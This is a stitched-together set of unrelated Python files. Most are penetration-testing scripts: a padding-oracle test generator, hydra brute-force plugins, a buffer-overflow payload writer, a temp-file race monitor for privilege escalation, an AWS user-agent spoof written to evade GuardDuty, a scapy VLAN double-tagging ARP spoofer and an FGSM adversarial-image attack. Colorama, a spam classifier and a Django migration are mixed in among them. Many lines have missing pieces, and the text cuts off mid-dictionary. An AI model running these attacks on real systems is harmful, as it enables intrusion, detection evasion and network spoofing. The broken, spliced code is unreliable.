len( - self.offset for s in sizes: if datalen % s == 0 and datalen / s >= 2: self.blocksizes.add(s) if not len(self.blocksizes): if datalen >= 32: self.blocksizes.add(16) if datalen >= 16: self.blocksizes.add(8) if not len(self.blocksizes): raise Exception("Could not detect data's blocksize automatically.") def encode(self, data): def _enc(data): if self.encoding == PaddingOracleTestCasesGenerator.B64URL: return base64.urlsafe_b64encode(data) elif self.encoding == PaddingOracleTestCasesGenerator.B64STD: return base64.b64encode(data) elif self.encoding == PaddingOracleTestCasesGenerator.HEXENC: return ba.hexlify(data).strip() else: return data enc = _enc(data) if self.urlencoded: return urllib.quote_plus(enc) else: return enc def decode(self, data): def _decode(self, data): if self.urlencoded: data = urllib.unquote_plus(data) if self.encoding == PaddingOracleTestCasesGenerator.B64URL: return base64.urlsafe_b64decode(data) elif self.encoding == PaddingOracleTestCasesGenerator.B64STD: return base64.b64decode(data) elif self.encoding == PaddingOracleTestCasesGenerator.HEXENC: return ba.unhexlify(data).strip() else: return data dbg("Hex dump of data before decoding:\n" + hex_dump(data)) decoded = _decode(self, data) dbg("Hex dump of data after decoding:\n" + hex_dump(decoded)) return decoded def construct_second_to_last_block(self, data, blocksize, value, offset=0): assert len(data) >= 2 * blocksize, "Too short data to operate on it with given blocksize." assert abs(offset) < blocksize, "Incorrect offset was specified. Out-of-bounds access." # Null vector with the last byte set to iterated value. block = '0' * (2*(blocksize-1)) + '%02x' % value if offset >= 0: # datadata<rest> return data[:-2*blocksize-offset] + ba.unhexlify(block) + data[-blocksize-offset:] else: # <rest>datadata return data[-offset:-2*blocksize] + ba.unhexlify(block) + data[-blocksize:] def generate_test_cases(self): cases = [] data = for size in self.blocksizes: dbg("Now generating test cases of %d blocksize." % size) for byte in range(256): # No offset cases.append(self.encode(self.construct_second_to_last_block(data, size, byte))) if self.offset != 0: cases.append(self.encode(self.construct_second_to_last_block(data, size, byte, self.offset))) cases.append(self.encode(self.construct_second_to_last_block(data, size, byte, -self.offset))) return cases def hex_dump(data): s = '' n = 0 lines = [] if len(data) == 0: return '<empty>' for i in range(0, len(data), 16): line = '' line += '%04x | ' % (i) n += 16 for j in range(n-16, n): if j >= len(data): break line += '%02x ' % ord(data[j]) line += ' ' * (3 * 16 + 7 - len(line)) + ' | ' for j in range(n-16, n): if j >= len(data): break c = data[j] if not (ord(data[j]) < 0x20 or ord(data[j]) > 0x7e) else '.' line += '%c' % c lines.append(line) return '\n'.join(lines) def main(): info('\n\tPadding Oracle test-cases generator') info('\tMariusz Banach / mgeeky, 2016\n') if len(sys.argv) < 2: warning('usage: <data> [blocksize]') sys.exit(0) data = sys.argv[1].strip() bsize = int(sys.argv[2]) if len(sys.argv) > 2 else 0 try: tester = PaddingOracleTestCasesGenerator(data, bsize) except Exception as e: error(str(e)) return False s = hex_dump( info('Decoded data:\n%s\n' % s) cases = tester.generate_test_cases() for case in cases: if DEBUG: dbg('...' + case[-48:]) else: print case info('\n[+] Generated in total: %d test cases for %s block sizes.' \ % (len(cases), ', '.join([str(e) for e in sorted(tester.blocksizes)]))) if __name__ == '__main__': main()
from owtf.config import config_handler from owtf.plugin.helper import plugin_helper from owtf.plugin.params import plugin_params DESCRIPTION = "Password Bruteforce Testing plugin" BRUTEFORCER = ["hydra"] CATEGORIES = [ "RDP", "LDAP2", "LDAP3", "MSSQL", "MYSQL", "CISCO", "CISCO-ENABLE", "CVS", "Firebird", "FTP", "FTPS", "HTTP-PROXY", "ICQ", "IMAP", "IRC", "NCP", "NNTP", "ORACLE-LISTENER", "ORACLE-SID", "PCANYWHERE", "PCNFS", "POP3", "POSTGRES", "REXEC", "RLOGIN", "RSH", "SIP", "SMB", "SMTP", "SNMP", "SOCKS5", "SSH", "SVN", "TEAMSPEAK", "TELNET", "VMAUTHD", "VNC", "XMPP", ] def run(PluginInfo): Content = [] args = { "Description": DESCRIPTION, "Mandatory": { "RHOST": config_handler.get_val("RHOST_DESCRIP"), "RPORT": config_handler.get_val("RPORT_DESCRIP"), "CATEGORY": "Category to use (i.e. " + ", ".join(sorted(CATEGORIES)) + ")", }, "Optional": { "BRUTEFORCER": "Bruteforcer to use (i.e. " + ", ".join(sorted(BRUTEFORCER)) + ")", "ONLINE_USER_LIST": config_handler.get_val("ONLINE_USER_LIST_DESCRIP"), "ONLINE_PASSWORD_LIST": config_handler.get_val( "ONLINE_PASSWORD_LIST_DESCRIP" ), "THREADS": config_handler.get_val("THREADS_DESCRIP"), "_RESPONSE_WAIT": config_handler.get_val("_RESPONSE_WAIT_DESCRIP"), "CONNECT_WAIT": config_handler.get_val("CONNECT_WAIT_DESCRIP"), "REPEAT_DELIM": config_handler.get_val("REPEAT_DELIM_DESCRIP"), }, } for args in plugin_params.get_args(args, PluginInfo): plugin_params.set_config(args) resource = config_handler.get_resources( "PassBruteForce_" + args["BRUTEFORCER"] + "_" + args["CATEGORY"] ) Content += plugin_helper.CommandDump( "Test Command", "Output", resource, PluginInfo, "" ) # No previous output return Content
#!/usr/bin/python from struct import * buffer = '' buffer += 'a'*24 buffer += pack("<Q", 0x0000004005e3) f = open("input.txt", "w") f.write(buffer)
import os.path import re from patchers import patcher_interface class exported_intent_patcher(patcher_interface.patcher): ''' Removes a random intent filter ''' difficulty = 1 def patch(self): ''' A simple patch to remove an intent filter from an exported activity ''' self.logger("Removing an intent filter from an exported activity") path_to_android_manifest = self._get_path_to_file("AndroidManifest.xml", os.path.join(self.working_dir, "app", "src", "main")) manifest_file = open(path_to_android_manifest, "r") manifest_file_data = manifest_file.close() manifest_file_data = re.sub(r'(android:exported="true">(((.|\n)*)<\/intent-filter>))', 'android:exported="true">', manifest_file_data) manifest_file = open(path_to_android_manifest, "w") manifest_file.write(manifest_file_data) manifest_file.close() return "An activity is exported but does not have any active intent filters." # TODO: Add patch to add an exported True flag to an activity
''' Win race conditions! Inject code before a file gets executed and then deleted. Suggestion: * Run the script for 24 hours or longer. Interesting bugs and information disclosures on top of potential privilege escalations will likely be reported. Ideas: * Can save the output to a file. * Can send the output to a remote server. ''' import tempfile import threading import win32file import win32con import os # These are common temp file directories - modify at will dirs_to_monitor = ["C:\\WINDOWS\\Temp", tempfile.gettempdir()] # File modification constants FILE_CREATED = 1 FILE_DELETED = 2 FILE_MODIFIED = 3 FILE_RENAMED_FROM = 4 FILE_RENAMED_TO = 5 def start_monitor(path_to_watch): # Create a thread for each monitoring run FILE_LIST_DIRECTORY = 0x0001 h_directory = win32file.CreateFile( path_to_watch, FILE_LIST_DIRECTORY, win32con.FILE_SHARE_READ | win32con.FILE_SHARE_WRITE | win32con.FILE_SHARE_DELETE, None, win32con.OPEN_EXISTING, win32con.FILE_FLAG_BACKUP_SEMANTICS, None) while 1: try: results = win32file.ReadDirectoryChangesW( h_directory, 1024, True, win32con.FILE_NOTIFY_CHANGE_FILE_NAME | win32con.FILE_NOTIFY_CHANGE_DIR_NAME | win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES | win32con.FILE_NOTIFY_CHANGE_SIZE | win32con.FILE_NOTIFY_CHANGE_LAST_WRITE | win32con.FILE_NOTIFY_CHANGE_SECURITY, None, None) for action, file_name in results: full_filename = os.path.join(path_to_watch, file_name) if action == FILE_CREATED: print "[+] Created: {}".format(full_filename) elif action == FILE_DELETED: print "[-] Deleted: {}".format(full_filename) elif action == FILE_MODIFIED: print "[*] Modified: {}".format(full_filename) # Dump put the file contents print "[...] Dumping contents..." try: fd = open(full_filename, "rb") contents = fd.close() print contents print "[!!!] Dump complete." except: print "[!!!] Failed to dump contents." elif action == FILE_RENAMED_FROM: print "[>] Renamed from: {}".format(full_filename) elif action == FILE_RENAMED_TO: print "[<] Renamed to: {}".format(full_filename) else: print "[???] Unknown: {}".format(full_filename) except: pass for path in dirs_to_monitor: monitor_thread = threading.Thread(target=start_monitor, args=(path,)) print "[*] Spawning monitoring thread for path: {}".format(path) monitor_thread.start()
from owtf.managers.resource import get_resources from owtf.plugin.helper import plugin_helper DESCRIPTION = "Plugin to assist manual testing" def run(PluginInfo): resource = get_resources("ExternalSSIInjection") Content = plugin_helper.resource_linklist("Online Resources", resource) return Content
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. import atexit import contextlib import sys from .ansitowin32 import AnsiToWin32 orig_stdout = None orig_stderr = None wrapped_stdout = None wrapped_stderr = None atexit_done = False def reset_all(): if AnsiToWin32 is not None: # Issue #74: objects might become None at exit AnsiToWin32(orig_stdout).reset_all() def init(autoreset=False, convert=None, strip=None, wrap=True): if not wrap and any([autoreset, convert, strip]): raise ValueError('wrap=False conflicts with any other arg=True') global wrapped_stdout, wrapped_stderr global orig_stdout, orig_stderr orig_stdout = sys.stdout orig_stderr = sys.stderr if sys.stdout is None: wrapped_stdout = None else: sys.stdout = wrapped_stdout = \ wrap_stream(orig_stdout, convert, strip, autoreset, wrap) if sys.stderr is None: wrapped_stderr = None else: sys.stderr = wrapped_stderr = \ wrap_stream(orig_stderr, convert, strip, autoreset, wrap) global atexit_done if not atexit_done: atexit.register(reset_all) atexit_done = True def deinit(): if orig_stdout is not None: sys.stdout = orig_stdout if orig_stderr is not None: sys.stderr = orig_stderr @contextlib.contextmanager def colorama_text(*args, **kwargs): init(*args, **kwargs) try: yield finally: deinit() def reinit(): if wrapped_stdout is not None: sys.stdout = wrapped_stdout if wrapped_stderr is not None: sys.stderr = wrapped_stderr def wrap_stream(stream, convert, strip, autoreset, wrap): if wrap: wrapper = AnsiToWin32(stream, convert=convert, strip=strip, autoreset=autoreset) if wrapper.should_wrap(): stream = return stream
#!/usr/bin/env python ''' Author: Christopher Duffy Date: February 2, 2015 Purpose: To grab your current Public IP (Eth & WLAN), Private IP, MAC Addresses, FQDN, and Hostname Name: Copyright (c) 2015, Christopher Duffy All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ''' import os import socket import subprocess import shutil import errno if != "nt": import fcntl import urllib2 import struct import uuid def get_ip(inter): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) ip_addr = socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', inter[:15]))[20:24]) return ip_addr def get_mac_address(inter): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', inter[:15])) mac_address = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1] return mac_address def get_localhost_details(interfaces_eth, interfaces_wlan): hostdata = "None" hostname = "None" windows_ip = "None" eth_ip = "None" wlan_ip = "None" host_fqdn = "None" eth_mac = "None" wlan_mac = "None" windows_mac = "None" hostname = socket.gethostbyname(socket.gethostname()) if hostname.startswith("127.") and != "nt": hostdata = socket.gethostbyaddr(socket.gethostname()) hostname = str(hostdata[1]).strip('[]') host_fqdn = socket.getfqdn() for interface in interfaces_eth: try: eth_ip = get_ip(interface) if not "None" in eth_ip: eth_mac = get_mac_address(interface) break except IOError: pass for interface in interfaces_wlan: try: wlan_ip = get_ip(interface) if not "None" in wlan_ip: wlan_mac = get_mac_address(interface) break except IOError: pass else: windows_ip = socket.gethostbyname(socket.gethostname()) windows_mac = uuid.getnode() windows_mac = ':'.join(("%012X" % windows_mac)[i:i+2] for i in range(0, 12, 2)) hostdata = socket.gethostbyaddr(socket.gethostname()) hostname = str(socket.gethostname()) host_fqdn = socket.getfqdn() return hostdata, hostname, windows_ip, eth_ip, wlan_ip, host_fqdn, eth_mac, wlan_mac, windows_mac def get_public_ip(request_target): grabber = urllib2.build_opener() grabber.addheaders = [('User-agent','Mozilla/5.0')] try: public_ip_address = except urllib2.HTTPError, error: print("There was an error trying to get your Public IP: %s") % (error) except urllib2.URLError, error: print("There was an error trying to get your Public IP: %s") % (error) return public_ip_address wireless_ip = "None" windows_ip = "None" ethernet_ip = "None" public_ip = "None" host_fqdn = "None" hostname = "None" fqdn = "None" ethernet_mac = "None" wireless_mac = "None" windows_mac = "None" target_url = "" inter_eth = ["eth0", "eth1", "eth2", "eth3"] inter_wlan = ["wlan0", "wlan1", "wlan2", "wlan3", "wifi0", "wifi1", "wifi2", "wifi3", "ath0", "ath1", "ath2", "ath3"] public_ip = get_public_ip(target_url) hostdata, hostname, windows_ip, ethernet_ip, wireless_ip, host_fqdn, ethernet_mac, wireless_mac, windows_mac = get_localhost_details(inter_eth, inter_wlan) if not "None" in public_ip: print("Your Public IP address is: %s") % (str(public_ip)) else: print("Your Public IP address was not found") if not "None" in ethernet_ip: print("Your Ethernet IP address is: %s") % (str(ethernet_ip)) print("Your Ethernet MAC address is: %s") % (str(ethernet_mac)) elif != "nt": print("No active Ethernet Device was found") if not "None" in wireless_ip: print("Your Wireless IP address is: %s") % (str(wireless_ip)) print("Your Wireless Devices MAC Address is: %s") % (str(wireless_mac)) elif != "nt": print("No active Wireless Device was found") if not "None" in windows_ip: print("Your Windows Host IP address is: %s") % (str(windows_ip)) print("Your Windows Mac address is: %s") % (str(windows_mac)) else: print("You are not running Windows") if not "None" in hostname: print("Your System's hostname is: %s") % (hostname) if host_fqdn == 'localhost': print("Your System is not Registered to a Domain") else: print("Your System's Fully Qualifed Domain Name is: %s") % (host_fqdn)
""" ACTIVE Plugin for Generic Unauthenticated Web App Fuzzing via Wapiti This will perform a "low-hanging-fruit" pass on the web app for easy to find (tool-findable) vulns """ from owtf.managers.resource import get_resources from owtf.plugin.helper import plugin_helper DESCRIPTION = "Active Vulnerability Scanning without credentials via Wapiti" def run(PluginInfo): resource = get_resources("Wapiti_Unauth") return plugin_helper.CommandDump("Test Command", "Output", resource, PluginInfo, [])
#! /usr/bin/python3.6 class Methods(): class_var=200 def __init__(self): self.variable=0 def instance_method(self): self.variable=100 print("------------------------------") print("Inside Instance Method") print("Instance is : " +str(self)) print("Instance variable is : "+str(self.variable)) print("Class variable is : " +str(self.__class__.class_var)) print("------------------------------\n") @classmethod def class_method(cls): print("------------------------------") print("Inside Class Method") try: self.variable=22 print("Instance variable is : "+str(Methods().variable)) except Exception as ex: print("Cant access instance variable in class method") cls.class_var=33 print("Class is : " +str(cls)) print("Class variable is : "+str(cls.class_var)) print("------------------------------\n") @staticmethod def static_method(): print("Inside Static Method") try: print("Class=%s and Instance variable =%s : ",(class_var,str(self.variable))) except Exception as ex: print("Cant access class and instance variable in static method") class Driver(): def main(self): o=Methods() o.instance_method() o.class_method() Methods.class_method() o.static_method() Methods.static_method() print("\n*****************************************************") print("Lets see variable access of class variables\n\n") print("--------------------------------------------------") print('Accessing class variable with Instance "o" : '+str(o.class_var)) o.class_var=222 print('Modifying class variable with Instance "o" : o.class_var = 222') print('Accessing modified class variable with Instance "o" : ' +str(o.class_var)) print("--------------------------------------------------\n\n") print("-------------------------------------------------") oo=Methods() print('Accessing class variable with New instance "oo" : '+str(oo.class_var)) print('Changes not persisted thus modifying o.class_var created local copy for instance o') print("--------------------------------------------------\n\n") print("-------------------------------------------------") print('Accessing class variable with Class variable : '+str(Methods.class_var)) print('Changes not persisted thus modifying o.class_var created local copy for instance o') print("--------------------------------------------------\n\n") print("\n*****************************************************\n") d=Driver();d.main()
import foolbox import keras import numpy as np from keras.applications.resnet50 import ResNet50 import matplotlib.pyplot as plt # instantiate model keras.backend.set_learning_phase(0) kmodel = ResNet50(weights='imagenet') preprocessing = (np.array([104, 116, 123]), 1) fmodel = foolbox.models.KerasModel(kmodel, bounds=(0, 255), preprocessing=preprocessing) # get source image and label image, label = foolbox.utils.imagenet_example() # apply attack on source image # ::-1 reverses the color channels, because Keras ResNet50 expects BGR instead of RGB attack = foolbox.attacks.FGSM(fmodel) adversarial = attack(image[:, :, ::-1], label) plt.figure() plt.subplot(1, 3, 1) plt.title('Original') plt.imshow(image / 255) # division by 255 to convert [0, 255] to [0, 1] plt.axis('off') plt.subplot(1, 3, 2) plt.title('Adversarial') plt.imshow(adversarial[:, :, ::-1] / 255) # ::-1 to convert BGR to RGB plt.axis('off') plt.subplot(1, 3, 3) plt.title('Difference') difference = adversarial[:, :, ::-1] - image plt.imshow(difference / abs(difference).max() * 0.2 + 0.5) plt.axis('off')
""" tests.functional.cli.test_except ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ """ from tests.owtftest import OWTFCliTestCase class OWTFCliExceptTest(OWTFCliTestCase): categories = ["cli"] def test_except(self): """Run OWTF web plugins except one.""" self.run_owtf( "-s", "-g", "web", "-e", "OWTF-WVS-006", "%s://%s:%s" % (self.PROTOCOL, self.IP, self.PORT), ) self.assert_is_in_logs( "All jobs have been done. Exiting.", name="MainProcess", msg="OWTF did not finish properly!", ) self.assert_is_not_in_logs( "Target: %s://%s:%s -> Plugin: Skipfish Unauthenticated" % (self.PROTOCOL, self.IP, self.PORT), name="Worker", msg="Skipfish plugin should not have been run!", )
""" owtf.api.handlers.index ~~~~~~~~~~~~~~~~~~~~~~~ """ from owtf.api.handlers.base import UIRequestHandler class IndexHandler(UIRequestHandler): """Serves the main webapp""" SUPPORTED_METHODS = ["GET"] def get(self, path): """Render the homepage with all JavaScript and context. **Example request**: .. sourcecode:: http GET / HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 **Example response**: .. sourcecode:: http HTTP/1.1 200 OK Content-Encoding: gzip Vary: Accept-Encoding Server: TornadoServer/5.0.1 Content-Type: text/html; charset=UTF-8 """ self.render("index.html")
""" Plugin for probing snmp """ from owtf.managers.resource import get_resources from owtf.plugin.helper import plugin_helper DESCRIPTION = " SNMP Probing " def run(PluginInfo): resource = get_resources("BruteSnmpProbeMethods") return plugin_helper.CommandDump("Test Command", "Output", resource, PluginInfo, [])
# inspired by Abhijeet Singh classifier import os import numpy as np from collections import Counter from sklearn.svm import LinearSVC from sklearn.metrics import confusion_matrix def make_Dictionary(train_dir): emails = [os.path.join(train_dir,f) for f in os.listdir(train_dir)] all_words = [] for mail in emails: with open(mail) as m: for i,line in enumerate(m): if i == 2: words = line.split() all_words += words dictionary = Counter(all_words) list_to_remove = dictionary.keys() for item in list_to_remove: if item.isalpha() == False: del dictionary[item] elif len(item) == 1: del dictionary[item] dictionary = dictionary.most_common(3000) return dictionary def extract_features(mail_dir): files = [os.path.join(mail_dir,fi) for fi in os.listdir(mail_dir)] features_matrix = np.zeros((len(files),3000)) docID = 0; for fil in files: with open(fil) as fi: for i,line in enumerate(fi): if i == 2: words = line.split() for word in words: wordID = 0 for i,d in enumerate(dictionary): if d[0] == word: wordID = i features_matrix[docID,wordID] = words.count(word) docID = docID + 1 return features_matrix # Create a dictionary of words with its frequency train_dir = 'lingspam_public\\lemm_stop\\train-mails' dictionary = make_Dictionary(train_dir) # Prepare feature vectors per training mail and its labels train_labels = np.zeros(702) train_labels[351:701] = 1 train_matrix = extract_features(train_dir) # Training SVM and Naive bayes classifier and its variants model = LinearSVC(),train_labels) # Test the unseen mails for Spam test_dir = 'lingspam_public\\lemm_stop\\test-mails' test_matrix = extract_features(test_dir) test_labels = np.zeros(260) test_labels[130:260] = 1 result = model.predict(test_matrix) print confusion_matrix(test_labels,result)
import random import boto3 import botocore # A list of user agents that won't trigger GuardDuty safe_user_agents = [ 'Boto3/1.7.48 Python/3.7.0 Windows/10 Botocore/1.10.48', 'aws-sdk-go/1.4.22 (go1.7.4; linux; amd64)', 'aws-cli/1.15.10 Python/2.7.9 Windows/8 botocore/1.10.10' ] # Grab the current user agent user_agent = boto3.session.Session()._session.user_agent().lower() # Check if we are on Kali, Parrot, or Pentoo Linux against a lowercase version of the user agent if 'kali' in user_agent.lower() or 'parrot' in user_agent.lower() or 'pentoo' in user_agent.lower(): # Change the user agent to a random one from the list of safe user agents user_agent = random.choice(safe_user_agents) # Prepare a botocore config object with our user agent botocore_config = botocore.config.Config( user_agent=user_agent ) # Create the boto3 client, using the botocore config we just set up client = boto3.client( 'ec2', region_name='us-east-1', config=botocore_config ) # Print out the results of our EC2 DescribeInstances call print(client.describe_instances())
import urllib2 import re from os.path import basename from urlparse import urlsplit url = '' response = urllib2.urlopen(url) source = file = open("packtpub.txt", "w") file.write(source) file.close() patten = '(http)?s?:?(\/\/[^"]*\.(?:png|jpg|jpeg|gif|png|svg))' for line in open('packtpub.txt'): for m in re.findall(patten, line): print('https:' + m[1]) fileName = basename(urlsplit(m[1])[2]) print(fileName) try: img = urllib2.urlopen('https:' + m[1]).read() file = open(fileName, "w") file.write(img) file.close() except: pass break
#!/usr/bin/python import time from scapy.all import * iface = "en0" target_ip = '' fake_ip = '' fake_mac = 'c0:d3:de:ad:be:ef' our_vlan = 1 target_vlan = 2 ether = Ether() dot1q1 = Dot1Q(vlan=our_vlan) dot1q2 = Dot1Q(vlan=target_vlan) arp = ARP(hwsrc=fake_mac, pdst=target_ip, psrc=fake_ip, op="is-at") packet = ether/dot1q1/dot1q2/arp try: while True: sendp(packet, iface=iface) time.sleep(10) except KeyboardInterrupt: print("Exiting.. ") sys.exit(0)
# -*- coding: utf-8 -*- from south.utils import datetime_utils as datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding model 'Project' db.create_table(u'xtreme_server_project', ( ('project_name','django.db.models.fields.CharField')(max_length=50, primary_key=True)), ('start_url','django.db.models.fields.URLField')(max_length=200)), ('query_url','django.db.models.fields.URLField')(max_length=200)), ('allowed_extensions','django.db.models.fields.TextField')()), ('allowed_protocols','django.db.models.fields.TextField')()), ('consider_only','django.db.models.fields.TextField')()), ('exclude_fields','django.db.models.fields.TextField')()), ('status','django.db.models.fields.CharField')(default='Not Set', max_length=50)), ('login_url','django.db.models.fields.URLField')(max_length=200)), ('logout_url','django.db.models.fields.URLField')(max_length=200)), ('username','django.db.models.fields.TextField')()), ('password','django.db.models.fields.TextField')()), ('username_field','django.db.models.fields.TextField')(default='Not Set')), ('password_field','django.db.models.fields.TextField')(default='Not Set')), ('addParameter_field','django.db.models.fields.TextField')(default='Not Set')), ('addParameter','django.db.models.fields.TextField')(default='Not Set')), ('auth_mode','django.db.models.fields.TextField')()), )) db.send_create_signal(u'xtreme_server', ['Project']) # Adding model 'Page' db.create_table(u'xtreme_server_page', ( (u'id','django.db.models.fields.AutoField')(primary_key=True)), ('URL','django.db.models.fields.URLField')(max_length=200)), ('content','django.db.models.fields.TextField')(blank=True)), ('visited','django.db.models.fields.BooleanField')(default=False)), ('auth_visited','django.db.models.fields.BooleanField')(default=False)), ('status_code','django.db.models.fields.CharField')(max_length=256, blank=True)), ('connection_details','django.db.models.fields.TextField')(blank=True)), ('project','django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])), ('page_found_on','django.db.models.fields.URLField')(max_length=200, blank=True)), )) db.send_create_signal(u'xtreme_server', ['Page']) # Adding model 'Form' db.create_table(u'xtreme_server_form', ( (u'id','django.db.models.fields.AutoField')(primary_key=True)), ('project','django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])), ('form_found_on','django.db.models.fields.URLField')(max_length=200)), ('form_name','django.db.models.fields.CharField')(max_length=512, blank=True)), ('form_method','django.db.models.fields.CharField')(default='GET', max_length=10)), ('form_action','django.db.models.fields.URLField')(max_length=200, blank=True)), ('form_content','django.db.models.fields.TextField')(blank=True)), ('auth_visited','django.db.models.fields.BooleanField')(default=False)), ('input_field_list','django.db.models.fields.TextField')(blank=True)), )) db.send_create_signal(u'xtreme_server', ['Form']) # Adding model 'InputField' db.create_table(u'xtreme_server_inputfield', ( (u'id','django.db.models.fields.AutoField')(primary_key=True)), ('form','django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])), ('input_type','django.db.models.fields.CharField')(default='input', max_length=256, blank=True)), )) db.send_create_signal(u'xtreme_server', ['InputField']) # Adding model 'Vulnerability' db.create_table(u'xtreme_server_vulnerability', ( (u'id','django.db.models.fields.AutoField')(primary_key=True)), ('form','django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])), ('details','django.db.models.fields.TextField')(blank=True)), ('url','django.db.models.fields.TextField')(blank=True)), ('re_attack','django.db.models.fields.TextField')(blank=True)), ('project','django.db.models.fields.TextField')(blank=True)), ('timestamp','django.db.models.fields.TextField')(blank=True)), ('msg_type','django.db.models.fields.TextField')(blank=True)), ('msg','django.db.models.fields.TextField')(blank=True)), ('auth','django.db.models.fields.TextField')(blank=True)), )) db.send_create_signal(u'xtreme_server', ['Vulnerability']) # Adding model 'Settings' db.create_table(u'xtreme_server_settings', ( (u'id','django.db.models.fields.AutoField')(primary_key=True)), ('allowed_extensions','django.db.models.fields.TextField')()), ('allowed_protocols','django.db.models.fields.TextField')()), ('consider_only','django.db.models.fields.TextField')()), ('exclude_fields','django.db.models.fields.TextField')()), ('username','django.db.models.fields.TextField')()), ('password','django.db.models.fields.TextField')()), ('auth_mode','django.db.models.fields.TextField')()), )) db.send_create_signal(u'xtreme_server', ['Settings']) # Adding model 'LearntModel' db.create_table(u'xtreme_server_learntmodel', ( (u'id','django.db.models.fields.AutoField')(primary_key=True)), ('project','django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])), ('page','django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Page'])), ('form','django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])), ('query_id','django.db.models.fields.TextField')()), ('learnt_model','django.db.models.fields.TextField')(blank=True)), )) db.send_create_signal(u'xtreme_server', ['LearntModel']) def backwards(self, orm): # Deleting model 'Project' db.delete_table(u'xtreme_server_project') # Deleting model 'Page' db.delete_table(u'xtreme_server_page') # Deleting model 'Form' db.delete_table(u'xtreme_server_form') # Deleting model 'InputField' db.delete_table(u'xtreme_server_inputfield') # Deleting model 'Vulnerability' db.delete_table(u'xtreme_server_vulnerability') # Deleting model 'Settings' db.delete_table(u'xtreme_server_settings') # Deleting model 'LearntModel' db.delete_table(u'xtreme_server_learntmodel') models = { u'xtreme_server.form': { 'Meta': {'object_name': 'Form'}, 'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'form_action': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}), 'form_content': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'form_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'form_method': ('django.db.models.fields.CharField', [], {'default': "'GET'", 'max_length': '10'}), 'form_name': ('django.db.models.fields.CharField', [], {'max_length': '512', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'input_field_list': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}) }, u'xtreme_server.inputfield': { 'Meta': {'object_name': 'InputField'}, 'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'input_type': ('django.db.models.fields.CharField', [], {'default': "'input'", 'max_length': '256', 'blank': 'True'}) }, u'xtreme_server.learntmodel': { 'Meta': {'object_name': 'LearntModel'}, 'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'learnt_model': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Page']"}), 'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}), 'query_id': ('django.db.models.fields.TextField', [], {}) }, u'': { 'Meta': {'object_name': 'Page'}, 'URL': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'connection_details': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'page_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}), 'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}), 'status_code': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}), 'visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}) }, u'xtreme_server.project': { 'Meta': {'object_name': 'Project'}, 'addParameter': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}), 'addParameter_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}), 'allowed_extensions': ('django.db.models.fields.TextField', [], {}), 'allowed_protocols': 